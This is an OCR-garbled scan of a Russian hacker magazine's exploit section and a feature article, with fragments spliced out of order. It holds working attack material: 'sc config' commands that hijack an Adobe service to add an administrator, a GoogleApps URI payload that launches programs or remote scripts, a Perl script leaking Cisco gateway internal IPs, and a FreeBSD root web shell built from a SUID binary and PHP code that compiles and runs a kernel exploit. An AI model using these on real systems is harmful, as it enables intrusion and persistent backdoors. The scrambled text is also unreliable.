НЫЙ СКРИПТ ДЛЯ ПРОВЕРКИ 
УЯЗВИМОСТЕЙ 5МВ, КУДА 
БЫЛАВКЛЮЧЕНАПРОВЕРКА 
НА ОТКАЗ В О БСЛ УЖИ ВАН И И 
ПР0Т0К0ЛА5МВѴ2 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



ЕХРЮІТ5 



РЕѴІЕѴѴ 



ыЫеЗ Х55В0РЕРА 

]Щ^ Л 



з . зепсі (ЪиВВ ) 



з . сіозе ( ) 



50ШТІ0Ы 



| Уязвимость не распространяется на ѴѴіпсІоѵѵз Зегѵег 2008 
П2 для х64-битных платформ и ѴѴіпсІоѵѵз Зегѵег 2008 Р2для капіит 
платформ: 



затем вызватьутилитудля управления сервисами («вс сопбд») и заме- 
нить путь, указывающий на другое приложение (например, вредонос- 
ное], или выполнить неавторизированную команду, но с привилегиями 
5Ѵ5ТЕМ. Соответственно, перезагрузившись, эффект почувствуют все. 
Что же та кое Зесигку сіезсгіріог? 

> зс зШзксж " Ас1оЪеАсВіѵеЕі1еМопіВог8 . О " 



МісгозоВВ Міпскжз 2 000 Зегѵісе Раск 4 

Шіпсіоѵѵз ХР Зегѵісе Раск 2 апсі Шіпсіоѵѵз ХР Зегѵісе Раск 3 

Шіпсіоѵѵз ХР РгоВеззіопаІ хб4 ЕсІіВіоп Зегѵісе Раск 2 

Шпскжз Зегѵег 2 003 Зегѵісе Раск 2 

Ѵ/іпсІоѵѵз Зегѵег 2 003 х64 ЕсІіВіоп Зегѵісе Раск 2 

Ѵ/іпсІоѵѵз Зегѵег 2 003 міВк ЗР2 Вог ІВапіит-ЪазесІ ЗузВетз 

Ѵ7іп<іоѵѵз 7 Вог 32-ЪіВ ЗузВетз 

Ѵ7іп<іоѵѵз 7 Вог х64-Ъазе<і ЗузВетз 

Шпсіоѵ/з Зегѵег 2008 К2 Вог х64-Ьазес! ЗузВетз 

Шіпсіоѵ^з Зегѵег 2 00 8 К2 Вог ІВапіит-ЬазесІ ЗузВетз 

Еаигепі ОаШе, обнародовавший информацию обуязвимости в 5МВѵ2, 
чуть позже обнаружил, что она была внесена в систему в декабре 2007 
вместе с патчем, исправлявшим возможноеудаленное исполнение кода 
во все том же 5МВѵ2. Обычнота кие патчи рейтингуются МЗкаккри- 
тические, но здесь он был помечен всего лишь как важный, поскольку 
использование уязвимости было невозможно в стандартной конфигу- 
рации. 

Решением проблемы может стать принудительное отключение прото- 
кола 5МВ ѵ2. С сайта производителя можно ска чать утилиту, которая 
отключает протокол [ до.ппісго501і.сопп/?ипкіс1=9683379 ]. 



Б: (А; ; ССЬСЗШРШШТЬОСККС ; ; ; ЗУ) (А; ; ССВСЪСЗШРДОРВТЬОСКЗВ 
КСѴГОѴГО? ? ; ВА) (А; ; СС 

ЬСЗЖлОСККС; ; ; АП) (А; ; ССЬСЗШРМРВТЬОСРКС ; ; ; РБ) 

(А; ; ССВСЬСЗШР^РВТЬОСРЗВКСШ 

ѴГО; ; ;ШЭ) 

Для справки: 

ѴѴй — Мосіііу регтіззіопз 
ѴѴО — Мосіііу оѵѵпег 

Правила ѴѴО и ѴѴО разрешены для всех, что не является хорошим тоном. 



ЕХРЮІТ 



> зс зВор "Ас1оЬеАсВіѵеРі1еМопіВог8 . 0 " 

>зс сопВід " Ас1оЪеАсВіѵеРі1еМопіВог8 . 0 " ЪіпРаВк= 
"стсі /с пеВ изег асЫэе кіііз /асісі && пеВ Іосаідгоир 
АсЗшіпізВгаВогз асіоЪе /асісі" 

> зс зВагВ "АсіоЬеАсВіѵеРі1еМопіВог8 . 0 " 

гипаз /поргоіііе /изег : %СОМРВТЕШАМЕ%\ асіоЬе сшсі 




ОБХОД ОГРАНИЧЕНИЙ БЕЗОПАСНОС- 
ТИ, ИСПОЛЬЗУЯ АйОВЕ РН0Т05Н0Р 
ЕЬЕМЕІЧТБ 8.0 АСТІѴЕ РІЬЕ МОЫІТОР 



ШШ Итак, как гласит вступление, АбоЬе АсОѵе Рііе МопіІогѴ8 устанав- 
ливается с некорректным дескриптором безопасности. Злонамеренный 
пользовательс ограниченными правами может приостановить сервис, 



Теперь можно спокойно залогиниться в качестве администратора систе- 
мы с данными абобе: кіііз. 



ТАРСЕТ5 



| Все операционные системы линейки ѴѴіпсІоѵѵз. Модультести- 
ровался на ѴѴіпсІоѵѵз ХР5РЗ. 



50ШТЮІЧ 



Смени дескриптор безопасности с помощью збзеВ 
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В 




Сізсо Оаіа Сепіег 3.0 



ОКНО ЗАГРУЗКИ В 
М02ІЫ.АРІКЕР0Х 



Епй-№-впв Аррі^віия ОвИѵвгу боііЛвп 




ЕХРЮІТ5 

РЕѴІЕѴѴ 




АСЕ ХМ І_ 6АТЕѴѴАѴ — ОДИ Н ИЗ 
ВЕДУЩИХ ПРОДУКТОВ СІБСО для 
ЗАЩИТЫ 0ТХМІ_-005'А И РАЗЛИЧ- 
НЫХ СЕТЕВЫХ ВОЗДЕЙСТВИЙ 





> зс зсІзеБ " Ас1оЪеАсБіѵеРі1еМопі1іог8 . О " 

Б: (А; ; ССБСЗМБОСККС ; ; ; АІІ) (А; ; ССЬСЗШРЬОСККС ; ; ;РБ) 

(А; ; ССБСБСЗМКРМРБТБОСКЗБ 

КСШИО; ; ;ВА) (А; ; ССБСЗМКРМРБТБОСККС ; ? ? ЗУ) 

[ЗС] ЗеБЗегѵісеОЬдесЦЗесигіЦу ЗБССЕЗЗ 

Что означаютэти буквы? Вообще, дескриптор безопасности, каки права 
доступа, является абстрактным типом данным, отвечающим за орга- 
низацию безопасности доступа кобъектам системы, ее компонентам, 
а главное, папкам и файлам. Традиционно дескриптор безопасности 
содержит: 



• Оѵтет ЗІБ 

• Сгоир ЗІБ 

• БАСЪ: БізсгеБіопагу Ассезз СопБгоІ БізБ 

• ЗАСБ : ЗузБеш Ассезз СопБгоІ БізБ 

• СопБгоІ Тіадз 

С первыми двумя еще понятно, это идентификаторы принадлежнос- 
ти, а что такое 0АСІ_/5АСІ_? Речь идето двух принципиально разных 
АСІ_-листах, один из которых контролирует права конкретных поль- 
зователей и групп, а другой — способы их доступа. Соответственно, 
первую в литературе называют «дискреционная система доступа», а 



© ФИШКИ ѴѴШ00ѴѴ5 7: СИСТЕМА ПОИСКА И БИБЛИОТЕКИ 



Хочу рассказать тебе об одной 
из моих любимых фишек в 
ѴѴіпсІоѵѵз 7 — мгновенном 
поиске. Найти любую програм- 
му или файл на компьютере 
теперь можно за пару секунд. 
Можно не задумываться, куда 
ты сохраняешь файлы, а прос- 
то находить их по ключевым 
словам. С тем количеством 
программ, которые я устанав- 
ливаю на компьютер, просто 
найти нужную программу 
в меню «Пуск» нереально. 
Вместо этого можно написать 
часть ее названия, и поиск 
сам найдет ее. Причем рабо- 
тает это просто — я нажимаю 
кнопку <ѴѴіп> и тут же начи- 



наю ввод ключевых слов, 
без лишних телодвижений. 
Получается своеобразная кон- 
соль для запуска приложений 
и инструмент для поиска чего 
угодно: документов, программ, 
контактов, писем электронной 
почты и т.д. Раньше для такой 
штуки пришлось бы уста- 
навливать дополнительную 
утилиту, вроде БаипсЬу [ ѵѵѵѵѵѵ. 
ІаипсЬѵ.пеІ: ). Молниеносность 
поиска реализуется за счет 
предварительного индекси- 
рования, которое очень недо- 
любливают некоторые пользо- 
ватели, ссылаясь на тормоза 
во время индексирования. Я 
же лично деятельность индек- 



сирующего робота не заметил. 
Тут есть хинт. Если пользо- 
ватель активно использует 
компьютер, индексатор сводит 
свою деятельность практи- 
чески до нуля. Более того, 
процесс всегда можно остано- 
вить или сузить круг элемен- 
тов для индексации, открыв 
«Параметры индексирова- 
ния». Стоп! Ты полез искать 
такой пункт в панели управле- 
ния? А как же поиск? :) 
Система поиска отлично 
дополняется другим новов- 
ведением — библиотеками. 
Библиотека раскладывает все 
файлы по типам — больше не 
нужно искать разбросанные по 



компьютеру видео. Впрочем, 
ограничиваться одним лишь 
стандартными ЫЬгагіез глупо. 
Фишка как раз в том, что можно 
создать свои собственные биб- 
лиотеки и наладить с их помо- 
щью слежения за нужными 
тебе папками. Т.е. если хочешь 
собрать воедино все свои про- 
граммерские проекты, доста- 
точно визуально сложить папки 
с сорцами в новую библиотку 
и дальше быстро обращаться 
к ним через нее. В результате 
получается доступ к данным из 
самых разных уголков жесткого 
диска в одном месте, при этом 
физически все файлы остаются 
на своих местах. 
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ПРЕИМУЩЕСТВА 
5МВѴ2 ОЧЕВИДНЫ. 
ПОЗАБОТИВШИСЬ О 
ФУНКЦИОНАЛЕ, РАЗ- 
РАБОТЧИКИ УДЕЛИЛИ 
МАЛО ВНИМАНИЯ ЕГО 
БЕЗОПАСНОСТИ 



ЕХРЮІТ5 

КЕѴІЕѴѴ 
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ТНгоидНриі, Тіте іо Сотріѳііоп оі Соруіпд 
а 10-МВ Місгозоіі Оііісе РМе Асгозз а Зітиіаіесі ѴѴАМ 

Ітрасі оі МісгозоК ѴѴіпсіоѵѵз Зегѵег 2003 апсі ѴѴіпсіоѵѵз Зегѵег 2008 
оп ѴѴіпсіоѵѵз ХР апсі ѴѴіпсІоѵѵз Ѵізіа Сііепіз 





■8 

§ 



Я 



вторую — «мандатная». Если честно, я не очень люблю этих выражений, 
но для разговора — возьми на вооружение. Все эти буковки описывают 
конкретное правило доступа. Более подробно с ними можно ознакомить- 
ся в описании языка Бесигііу Оезсгіріог Оебпібоп Бапдиаде. Специаль- 
ной «строкой» представлено описание основныхзначений оѵѵпег (0 :) , 
ргітагу дгоир (0:), ОАСБ (Б:) и БАС Б (5:): 

О : оѵтег_зісІ 
С : дгоир_зісІ 

Б: бас1_І1адз (збгіпд_асе1) ( збгіпд_асе2 ) . . . (збгіпд_ 
асеп) 

3 : зас1_І1адз ( збгіпд_асе1 ) ( збгіпд_асе2 ) . . . (збгіпд_ 
асеп) 

0ѵтег_зіс1 — ЗІБ, идентифицирующий владельца 
Сгоир_зісІ — ЗІБ, идентифицирующий основную группу объек- 
та (Ргітагу) 

Бас1_І1адз — флаги, накладывающие ограничения на БАСБ 
Зас1_І1адз — флаги, накладывающие ограничения на ЗАСБ 
збгіпд_асе — идентификаторы флагов 

Ознакомиться с идентификаторами флагами, можно здесь І тзсіп. 

тісго5оНсот/ги-ги/ІіЬгагѵ/аа374928%28еп-и5.Ѵ5.85%29.азрх 1: 



ЕЕ - РІБЕ_СЕБЕКІС_КЕАБ 
ЕМ - ЕІЬЕ_СЕБЕКІС_ШІТЕ 
РХ - РІЬЕ_СЕБЕКІС_ЕХЕСБТЕ 

Права доступа на ключи реестра 
КА - КЕУ_АББ_АССЕЗЗ 
КК - КЕУ_КЕАБ 
Ш - КЕУ_ШІТЕ 
КХ - КЕУ_ЕХЕСБТЕ 

Именно эти идентификаторы — в комплексе с идентификаторами ЗЮ, 
наиболее важные из которых перечислены ниже: 

МБ — «Еѵегуопе» (неочевидно, расшифровывается как 
ЗЕСШІТУ_ШКББ_КІБ) 

АМ — Апопушоиз 

ВА — ВиіІЕ-Іп АбтіпізБгаБогз 
ЗА — ЗузБет АбтіпізБгабогз 

Исходя изэтихсоображений, основная суть уязвимости втом, что практичес- 
ки максимальные привилегии выданы ѴѴБ, а не ВА или БУ. Следи за этим, так 
как подобная мелочь может породить огромную брешь в безопасности. 



Родовые права доступа: 
СА - СЕКЕКІС_АББ 
СК - СЕБЕ К I С_КЕ АВ 
СМ - СЕБЕКІС_МКІТЕ 
СХ - СЕБЕКІС_ЕХЕСБТЕ 



Стандартные права доступа: 
КС - КЕАВ_СОРГТКОЕ 
ЗБ - БЕБЕТЕ 
МБ - ШІТЕ_БАС 
НО - ЖІТЕ_ОШЕК 



Права доступа к директориям: 
КР - КЕАВ_РКОРЕКТУ 
МР - ШІТЕ_РКОРЕКТУ 
СС - СКЕАТЕ_СНІББ 
БС - БЕБЕТЕ_СНІББ 



Права доступа к файлам: 
ЕА - РІЕЕ_АББ_АССЕЗЗ 




НЕАВТ0РИЗИР0ВАНН0Е ВЫПОЛНЕ- 
НИЕ КОДА ПУТЕМ ЭКСПЛУАТАЦИИ 
ФУНКЦИЙ ООООЬЕАРЗ 



Іи:ШЛ Зачем нужны СоодІеАррз? Во-первых, это крутые примочки, 
которые облегчают твою жизнь, равно как и половина замечательных 
сервисов от Соодіе. Некоторые используют СоодІеАррз в качестве 
заменителя МісгозоіТ Оиііоок. Устанавливать это дело крайне просто. 
Для начала опцию надо активировать в С МАИ, причем подразуме- 
вается, что слинковали ее с каким-либо доменом. Действительно, 
изменив записи Б N5, существует возможность использовать 6 МАП 
в качестве почтовика на своем ресурсе. Если все сделано правильно, 
тотам появятся М а і І/Са Іепсіа г/Оосз/Та Ік/Сопіасз, по сути, полный 
набор. Кто не готов поднимать приложения на своем домене, пункт 
может смело пропустить и настроить все для стандартных сервисов 
Ооодіе. Далее ставим из Соодіе Раск: Соодіе СЬготе исключительно 
для сервисов Соодіе Аррз и, собственно, сами Соодіе Аррз, которые 
на рабочем столе создадут полезные иконки и заменят таіі-клиент 
по умолчанию на СМаіІ. Третьим пунктом включаем из СЬ го те Оііііпе 
для СМаіІ, Саіепбаг и, если надо, Босз. Плюс, исследуем возможность 
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включения (Жііпе в боодіе Веабег перед отключением связи. Он ска- 
чивает все сообщения, и можно В55 читать оІНіпе. Безусловно, есть 
некоторое неудобство в том, что надо руками каждый раз включать 
режим зіапаіопе. Можно в настройках СЖіпе каждого сервиса создать 
на рабочем столе ярлыки на них, но это тоже не оченьудобно — обилие 
одинаковых ярлыков не может не огорчать. Можно поковырять реестр 
и настроить клиент по умолчанию на использование оНІіпе-версии. 
Прикинув все возможные варианты, я решил, что клиент по умолча- 
нию будет открывать оійіпе- версию почты в боодіе С Ь готе, а ссылки 
«таііію:» — его зависимую версию через боодіе Аррз. Поскольку 
второе уже было настроено самими боодіе Аррз, надо было поменять 
только первое. 

Компонентдоодіеаррз.игі.таіііо, отвечающий за почтовый обмен, заре- 
гистрирован в системе по следующим ключам реестра: 



ЕХРЮІТ 



| П ри отправке метода 0РТІСЫ5 НТТР-протокола существует 
возможность раскрыть внутренний ІР. Для чего? Может найтись множес- 
тво ситуаций. Например, подобный принцип обнаружения заключается 
в отлове «проксифицированных» пакетов на шлюзе провайдера. Это 
могут быть запросы вида «НТТР 1.1 66ЫЫЕ6Т», либо «6ЕТ/Р65Т» с пол- 
ным адресом 1Э РБ (РЕбтребует полный путь кзапрашиваемому ресурсу, 
а не относительный). Тем самым, можно обнаружить прокси, ведущие в 
локальную сеть (со стороны провайдера): 

# ! /изг/Ьіп/регІ -ѵі 

изе зкгіск; 

изе Зоскек цуг/ гБЕРАІІЬТ :сг1к /; # $СКЬР 
изе ІО : : Зоскек ; 



[НКРУ_СЬАЗЗРЗ_КООТ\Соод1еАррз . Игі .таііко] 

@="Соод1е Аррз ШЬ" 

" ЕсІікРІадз " =Ьех: 02,00,00,00 
" РгіепсІІуТуреЫаше" = "Соодіе Аррз ІШЬ" 

"ЦКЬ Ргокосоі " = " " 

[НКРУ_СЬАЗЗРЗ_КООТ\Соод1еАррз . ІІгІ . таіІкоХБекаиІкІсоп] 
@="С : \ \Ргодгатті\ ХСоодІеХ ХСоодІе Аррз \ Хдоодіеаррз . 
ехе , 0 " 

[НКРУ_СЬАЗЗРЗ_КООТ\Соод1еАррз . Югі . таі1ко\зЬ.е11 ] 

[НКРУ_СЬАЗЗРЗ_КООТ\Соод1еАррз . ІІгІ . таіІкоХзЬеІІХореп] 

[НКРУ_СЬАЗЗРЗ_КООТ\Ооод1еАррз . Югі . таі1ко\зЬ.е11\ореп\ 
соттапсі] 

@="С : \ \Ргодгашші\ \Соод1е\ ХСоодІе Аррз \ Хдоодіеаррз . ехе 
--таііко . доодіе . сош=\ " %1\ " " 



зиЬ Неасіег 

{ 



рппі " .+ = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 
ргіпк " / Сізсо АСР ХМЬ Сакемау <= б . 0 \\\п" ; 
ргіпк "| Іпкегпаі ІР АсМгезз Бізсіозиге I \п" ; 

} 

зиЬ изаде 

{ 

Неасіег ; 

ргіпк "Юзаде: $0 <Ьозк> [рогк (сіекаиік 80)]\п" 
ехік Охсіеасі; 

} 

ту $1юзк = зМк I I изаде; 
ту $рогк = зМк I I 80; 
ту $ахд; 



: + . \п" 



б помощью использования -ботаіп и -гепбегег-раіб флагов существует 
возможность обхода безопасности современных браузеров, включая ІЕ 
(всех версий) и боодіе СЬготе. 



ЕХРЮІТ 



Выполнение саіс.ехе на локальной машине: 



доодіеаррз .игі .таііко : / / " %2 0--<іотаіп= " --ѵ\Щ ак%2 0 
--гепсіегег-раЩі=са1с%2 0--по-запс1Ьох%2 0--х" / 

Выполнениеудаленного сценария, размещенного в «шаре»: 

доодіеаррз .игі .таііко : // " %2 0--<іотаіп= " --х%2 0 
--гепс!егег-рак1і=\\192 . 168 . 0 . 1\ипсзЬаге\з1і . Ъак%2 0--по- 
запс1Ьох%2 0 - -х " / 



ту $ахд_гезропзе; 

ту Орауіоасіз = ("ОРТІСЖЗ / НТТР/ 1.0" . $СКЬР . $СКЬР, 
"ОРТГОМЗ / НТТР/ 1.1" . $СНЬР . "Нозк: " . $Нозк . $СКЬР . 
$СКЬР) ; 

Неасіег ; 

ргіпк " [ + ] Соппескіпд Со $Нозк оп рогк $рогк . . . \п" ; 
ког (©рауіоасіз) { 

$ахд = ІО: : Зоскек : : ШЕТ->петл; ( РеегАсісІг => $Ьозк, 
РеегРогк => $рогк , 

Ргоко => ' Сер 1 ) 

ог сііе " [-] Соиісі пок сгеаке зоскек: $!\п"; 
ргіпк " [ + ] Зепсііпд рауіоасі . . . \п" ; 
ргіпк $ахд $_; 



Таким образом можно выполнять вредоносные и деструктирующие 
действия, например, произвольно удалить файл, организовать скрытый 
поток или добавить пользователя. 



ТАВСЕТ5 



| Іпіегпеі Ехріогег 8, ѵѵіпсіоѵѵз хр зрЗ. 
ІпТегпеІ: Ехріогег 7, ѵѵіпсіоѵѵз хр зрЗ. 
боодіе СЬготе 2.0.172.43. 



50ШТІ0Ы 



Удалить вышеупомянутый ІІВІ-ЬапбІег из реестра. 




СІ5С0 АСЕ ХМЬ 6АТЕѴѴАѴ <= 6.0 РАС- 
КРЫТИЕ СЕТЕВОЙ АДРЕСАЦИИ 



$ахд->геасІ ( $ахд_гезропзе , 102 4) ; 
ргіпк " [ + ] Рагзіпд гезропзе . . . \п" ; 

ік ( $ахд_гезропзе =~ /Сііепк ІР : (.*)/){ 
ргіпк " [ + ] Іпкегпаі ІР сіізсіозиге : $1\п"; 
$ахд->с1озе ( ) ; 
ехік ОхЪаЪе; 

} 

$ахд->с1озе ( ) ; 

} 

ргіпк " [-] №эк ѵиІпегаЫе > \п" ; 



Известнейший продукт, входящий в состав Сізсо Арріісаііоп 
Сопігоі Епдіпе (АСЕ), потерпел неудачу и засветился на практически 
каждом багтраке. 



ТАВОЕТ5 



АСЕХМБ баіеѵѵау геіеазе (6). 



ЗОШТІОЫ 



Установить обновление АСЕ ХМ Б баіеѵѵау геіеазе (б.ІІ. т 
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I ТѴѴОЗТЕР АМТІОѴѴЕРТѴгабМАП.СОМ 



РЕВОЛЮЦИЯ 
В *№х-СИСТЕМАХ 



НОВЫЙ 



ВЗГЛЯД НА ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 



ЗАЙДЯ НА СВЕЖЕЗАЛИТЫЙ ШЕЛЛ. ТЫ ПЕРВЫМ ДЕЛОМ СМОТРИШЬ 
СВОИ ПРАВА В СИСТЕМЕ, А ИМЕННО - РЕЗУЛЬТАТ КОМАНДЫ «10» В ЖХ- 
СИСТЕМАХ. НАШИ ПРАВА ПО ДЕФОЛТУ Ш0=80. ТО ЕСТЬ ОБЫЧНОГО ЮЗЕРА 
Ш№ НЕ ОТЧАИВАЙСЯ. МЫ НАУЧИМСЯ ПОДНИМАТЬ ИХ ДО НООТ'А И 
СОХРАНЯТЬ НЕПОСРЕДСТВЕННО В ВЕБ-ШЕЛЛЕ. ЗТО МЕЧТА ЛЮБОГО ХАКЕРА. 



НЕМНОГО ТЕОРИИ 51ІЮ — расшифро- 
вывается как Зет изег Ю, переводится 
с забугорного — «установить идентифи- 
катор пользователя». Если установлены 
права доступа 511 Ю и файл исполняемый 
(то есть наш будущий бинарник), то при 
выполнении этот файл получает не права 
запустившего его (ѵѵѵѵѵѵ), а права владель- 
ца файла. 

Эксплойт — в нашем случае это компьютер- 
ная программа, использующая уязвимости в 
программном обеспечении и применяемая 
для повышения привилегий (получения 
рута]. Это был вольный пересказ Википедии. 
Поор суперпользователь — специаль- 
ный аккаунт в ІІІЧІХ-подобных системах с 
идентификатором (ІІЮ) 0, владелец кото- 
рого имеет право на выполнение всех без 
исключения операций (грубо говоря, да 
простят меня линуксоиды, это аналог учетки 
Администратора в ѴѴіпсІоѵѵз]. Тоже вольный 
пересказ Википедии. 

Итак, с теорией покончили (надеюсь, было 
нескучно]. Движемся далее... 



НАПОЛЕОНОВСКИЕ ПЛАНЫ Затея у нас 

круче, чем у Наполеона, мы собираемся 
сделать мировую революцию. Нам предстоит 
удивить всех рутовым ѵѵеЬ-шеллом, которого 
нет ни у кого! А именно, предстоит: 

1. Составить задачу и продумать 
алгоритм работы нашего чудо -шелла 

2 . Накодить ЗІЛБник 

3 . Накодить непосредственно сам 
хѵеЪ-зНеІІ 

4 . Связать все эти прелести 
чудесных языков программирования 

5 . Таки получить и сохранить 
гООС'а на вражеском сервере 

ПЕРВЫМ ДЕЛОМ, ПЕРВЫМ 
ДЕЛОМ... АЛГОРИТМЫ Сначала приду- 
маем алгоритм работы и вообще всю схему 
получения и сохранения рута. Сразу пред- 
упрежу, что тестировать наше детище мы 
будем на сервере с установленной РгееВЗО 
7.1 (причины сего деяния оглашу позже]. 
Смысл всей затеи состоит в следующем — 



мы запустим эксплоит из ѴѴеЬ'а, то есть непо- 
средственно из нашего любимого браузера, 
установим суидные права и сменим хозяина 
(оѵѵпег'а] нашему суиднику и наконец-таки 
будем выполнять команды под рутом. 

Почему же мы выбрали для теста имен- 
но РгееВЗО 7.1? Все гениальное просто. 

Мы ведь будем юзать эксплойт из веба, 
а под данную ОСь как раз есть подходя- 
щий эксплойт кіітег ( ЫірѴ/тіІУѵОгт.сопп/ 
ехдЬіРз/8261) ■ Прелесть в том, что результат 
его работы — не получение /Ьіп/зб, а уста- 
новка иісІ=0, діб=0 вызывающему процессу. 
Это-то нам и нужно. 

ПИШЕМ зцшник От слов к делу, — я сразу 
приведу листинг кода, а уж после будем с 
тобой его разбирать. 

#іпс1ибе <збс1іо.Ъ.> 

#іпс1ибе <зС<і1іЬ.]т> 

шаіп(іпЦ агдс, сітаг *агдѵ[]) { 

/ / проверяем количество аргу- 
ментов 
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//проверяем наш пароль соо1_каск 

і і= (зкгстр (агдѵ[1] , " соо1_каск" ) == 0) { 

// Устанавливаем діб(0) гООк 
зекдіб ( 0 ) ; 

// Устанавливаем иіб(0) гООк 
зекиіб ( 0 ) ; 

// Выполняем команды с установлен- 
ными ранее правами 

зузкеш (агдѵ [2] ) ; 

} 

} 

гекигп 0 ; 

} 

Думаю, глядя на комментарии, уже становится ясен 
смысл нашей программы. Сначала мы проверяем коли- 
чество аргументов — их должно быть три: агдѵ[0] — имя 
самого скомпилированного ЗІІЮника, агдѵ[1] — наш 
пароль и агдѵ[2] — непосредственно сама команда. 
Разберемся с некоторыми моментами работы с бинарны- 
ми файлами при установленном ЗІІЮ-бите, дабы не воз- 
вращаться к этому позднее. 

1 . —ГѴ7ХГ—Х — х 1 тт арасЬе 5043 2009-09-09 
13:51 зиісі 

Файл зиіб с правами доступа -гѵтхг-х--х, то 
есть хозяин файла {шш) может читать, изме- 
нять и запускать на исполнение; члены груп- 
пы (араске) могут читать и запускать файл 
на исполнение, а все остальные пользователи 
могут лишь запускать на исполнение. 

К примеру, результат команды ісЗ. через 
наш файл для членов группы зіке будет 
подобным иіб=80 ( зіке) , діб=80 ( зіке) , 
дгоирз=80 (араске) 

2 . Устанавливаем бит ЩІВ на файл командой 

сішюб 4751 зиісі 

-ГШЗГ-Х--Х 1 шш арасЬе 5043 2009-09-09 
13:51 зиісі 

Наверняка, ты заметил, что символ х (запуск 
на исполнение) сменился на з |8ШВ бит) . 

Как мы уже знаем, бинарник с суид битом 
будет выполняться не от имени вызывающе- 
го, а от имени хозяина (охѵпег'а) . Опять 
же , результат команды іб через наш файл 
для членов группы зіке будет подобным 
иіб=80 [шт) , діб=80 {шт) , дгоирз = 80 (араске) . 

3. Забегая вперед, обозначим, что нам при- 
дется сменить владельца файла. Мы это сде- 
лаем под рутом командой сЪ.оѵт гоок зиісі. 

-гмзг-х--х 1 гооО араске 5043 2009-09-09 
13:51 зиісі 

И снова результат команды іб через наш файл 
будет подобным иіб=0(гоок), діб=0(гоок), 
дгоирз=8 0 ( араске) . Исходя из этого, уже 
видно, что любой пользователь системы, даже 
не входя в состав группы хозяина, имеет 
право на запуск бинарника, да мало того, 
еще и с правами хозяина, то бишь рута, так 
как установлен ЗІЛБ-бит. 

Так-с, с этим разобрались. Осталась самая малость, — 
скомпилировать файл. Делаем это командой дсс зиісі. с 
-о зиісі. В итоге получаем бинарный файл зиісі. Пример 
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использования будет таков — «./зиісі сооІ_Ьаск іб» (имя 
файла, пароль, команда] 



НАЧИНАЕМ □Е-КОДИНГ 



<?ркр 

/*********** С ОЫР X ѲІІЕАТ I ОИ **************/ 
$разз_зиіб = 'соо1_каск'; // пароль, кото- 
рый мы установили в сорцах суидника 

/*********** ЕЖ) СОЫРІСШАТІСЖ **********/ 

/*********** РІЖСТ I ОРГ 8 *************** / 

/* 

Наша функция по выполнению команд 
Если существует файл /кшр/сопк (так мы 
замаскировали наш суидник) , 

то выполнение команд идет через него , иначе 
просто функцией зузкеш. 

*/ 

кипскіоп каск_зузкет ( $стб, $разз_зиіб) 

{ 

ік ( кі1е_ехізкз ( ' /ктр/сопк 1 ) ) 

{ 

зузкеш ( * /ктр/сопк ' . $разз_зиіб. ' 

" 1 . $стб. ' " 1 ) ) ; 

} 

е1зе{ 

зузкеш ( $стб) ; 

} 



} 

/* 

Вот и главная функция, которая скопирует 
наш эксплойт и суидник , 
скомпилирует их и запустит 
*/ 

кипскіоп діѵе_ше_гоок ( ) 

{ 



/ / компилируем эксплойт 
зузкеш ('дсс Ьзб-ккішег.с -о /ктр/ 
сопкідиге ' ) ; 

/ / компилируем суидник 

зузкеш ('дсс зиіб.с -о /ктр/сопк'); 

// запускаем сплойт, меняем «овнера» 
суиднику и устанавливаем права 

зузкеш (' /кшр/сопкідиге; скоѵлі гоок /ктр/ 
сопк; скшоб 4777 /ктр/сопк'); 
гекигп ргіпк ’ОК! ' ; 

} 




> СІѴСІ 

Надискеты найдешь: 

1. Исходный кодѵѵеЬ- 
збеіі'а. 

2. Исходные коды 
ЗІІЮника. 

3. Скомпилирован- 
ный 51)1 Оник (компи- 
ляция происходила 

в РгееВЗО 7.1 2009 
года). 

4 . Исходный код экс- 
плоита Ьзб-кктег.с. 

5 . Скомпилиро- 
ванный эксплоит 
Ьзб-кбтег.с (компи- 
ляция происходила 
в РгееВЗО 7.1 2009 
года]. 

6. г57зЬеИ со скомпи- 
лированными суид- 
ником и эксплойтом, 
для более удобной 
заливки. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• ЬкрУ/тіІѵѵОгпп. 
сот/ехрІоі1:5/826 1 
— ЭКСПЛОИТ Ьзб- 

кктег.с. 

• бир://ѵѵікі.кгѵикоѵ. 
Ьіг/ѵѵікі/Специаль- 
ные права — описа- 
ние 51Л0, ЗОЮ и ЗОку 
битов. 



/********* ЕШ РЦЫСТІОКЗ ***************/ 



ргіпк 
' <ккш!> ' . 
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взлом 






Із -Ііа 




Зіѵе те гООі 



ГЛАВНАЯ СТРАНИЦА НАШЕГО 
ШЕЛЛА 



РЕЗУЛЬТАТ РАБОТЫ ЭКСПЛОИТА 
ПОСЛЕ НАЖАТИЯ КНОПКИ «6ІѴЕ 
МЕ РООТ» 




Ѳо иі<і=0 (го оі) §ісІ=0(уЬееГ) §г оир з=0 (\ѵЬе еі) , 8 0 (ѵ/ѵлѵ) 



Зіѵе те іООі 



ЗАВЕТНАЯ НАДПИСЬ РООТ. ЧТО ЕЩЕ НУЖНО ДЛЯ ПОЛНОГО СЧА- 
СТЬЯ... 



иі<і= ВО (шѵотѵ) §і<1=80 (шѵаѵ) §гоирз= 80 (ѵетѵѵѵ) 



Ѳіѵе те ЮОІ 



ДЕФОЛТНЫЕ ПРАВА СОВЕРШЕННО НЕ РАДУЮТ ГЛАЗ 




ГгееЬЗШснсдІкгтеІгаЫ «фБіЪу ЛгиіиАмы-Ь I ЩрІ/ѵтг Ьіі-іЬьы - - ВЗЕСТШЕЯ 2йй&1@$4 9 лЯіісЛігі рашія р^е ОкОММООО -> ОмЙЗЙММО 

(І^21773М^«] ■ Л*сш4 йгеег ягод 0x20000000 -=■ 0x20000000 [220-ЪуМ * ШЬп*р«*др**е... ■ Гочкі рвдк_сІвсі» <$ [0*с0сЭе^іЙ| " 

ОхОСВРСЕЮ^ [кс«і @0хЕРБРЕЕ28] ■к6тя-_4е1е« (ОяГООООООО) “кіівмг_^Ийе: 0 I ОКі 




> ІПІО 

Выражаю благо- 
дарностьза советы, 
тестирование 
и помощь следующим 
подозрительным лич- 
ностям — ІсеАпдеІ_, 
оРЬ, іокезѣег. 







> ѵѵагпіпд 

Внимание! Редакция 
журнала и автор не 
несут ответственно- 
сти за вред, воз- 
можно, причиненный 
при использовании 
методов и файлов 
данной статьи. Статья 
представлена только 
для ознакомления 
в образовательных 
целях. 



' сЬеасЬ * . 

' <ЦіЦІе>гООЦ ѵ^еЬ-зЬе11</ЦіШе> 1 . 

' с/Ь-еасЬ»' . 

